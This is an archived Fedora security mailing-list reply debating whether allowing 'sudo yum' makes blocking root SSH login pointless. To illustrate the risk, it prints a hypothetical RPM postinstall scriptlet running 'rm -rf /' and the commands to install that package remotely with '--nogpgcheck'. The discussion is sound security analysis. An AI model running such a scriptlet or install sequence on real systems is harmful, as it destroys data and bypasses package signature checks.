Re: Security Changes For Fedora 9

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 



On Jan 10, 2008 10:26 PM, Ville Skyttä <ville.skytta@xxxxxx> wrote:
> On Saturday 05 January 2008, Kevin Fenzi wrote:
> >
> > I find root ssh login handy for a number of reasons:
> [...]
> > - It's nice to be able to do for automated tasks (like say installing a
> > single new package on 20 machines without having to login and sudo on
> > each).
>
> "ssh -t $host sudo yum install $package" works for me...

What about (supposing I know the password of non-root user 'foo', and
assuming that 'foo' can sudo yum):

[hacker@tooeasy]$ rpm -q --scripts hacker_pkg.rpm
postinstall scriptlet (using /bin/sh):
rm -rf /
exit 0
[hacker@tooeasy]$ scp -p hackers_pkg.rpm foo@host:
[hacker@tooeasy]$ ssh -t foo@host sudo yum localinstall --nogpgcheck
./hackers_pkg.rpm


Am I wrong in assuming that yum is not necessarily a safe command to
be used with sudo? Or more exactly, that there is no point in blocking
root ssh logins if you're going to let a user that can login remotely
use sudo on yum?

Thanks.

--
Fedora-security-list mailing list
Fedora-security-list@xxxxxxxxxx
https://www.redhat.com/mailman/listinfo/fedora-security-list

[Index of Archives]     [Fedora Users]     [Fedora Desktop]     [Fedora SELinux]     [Big List of Linux Books]     [Yosemite News]     [KDE Users]     [Coolkey]

  Powered by Linux